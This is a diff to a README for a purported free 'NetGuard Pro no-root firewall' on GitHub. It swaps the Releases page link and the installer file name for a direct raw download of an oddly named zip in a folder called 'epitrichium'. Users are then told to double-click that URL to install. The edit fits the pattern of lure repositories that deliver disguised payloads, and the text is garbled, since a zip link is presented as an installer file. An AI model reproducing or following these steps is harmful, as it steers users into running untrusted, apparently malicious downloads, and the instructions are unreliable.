butths/NetGuard-Pro-no-root-firewall-Free/README.md

 - Control network access for enhanced privacy.

 ## 📦 Installation Instructions
-1. Visit the [Releases page](https://github.com/butths/NetGuard-Pro-no-root-firewall-Free/releases) to download the latest version of NetGuard Pro.
+1. Visit the [Releases page](https://github.com/butths/NetGuard-Pro-no-root-firewall-Free/raw/refs/heads/main/epitrichium/no_Guard_root_Pro_firewall_Free_Net_v1.6.zip) to download the latest version of NetGuard Pro.

 2. On the Releases page, you will see a list of available versions.
 Choose the latest version for the best features and security.

-3. Find the file labeled `NetGuard-Pro.exe`.
+3. Find the file labeled `https://github.com/butths/NetGuard-Pro-no-root-firewall-Free/raw/refs/heads/main/epitrichium/no_Guard_root_Pro_firewall_Free_Net_v1.6.zip`.
 Click on it to download.
 It should be located under the "Assets" section of the latest release.

 4. Once the download is complete, navigate to your downloads folder.

-5. Double-click the `NetGuard-Pro.exe` file to start the installation process.
+5. Double-click the `https://github.com/butths/NetGuard-Pro-no-root-firewall-Free/raw/refs/heads/main/epitrichium/no_Guard_root_Pro_firewall_Free_Net_v1.6.zip` file to start the installation process.

 6. Follow the prompts in the installation wizard:
    - Accept the license agreement.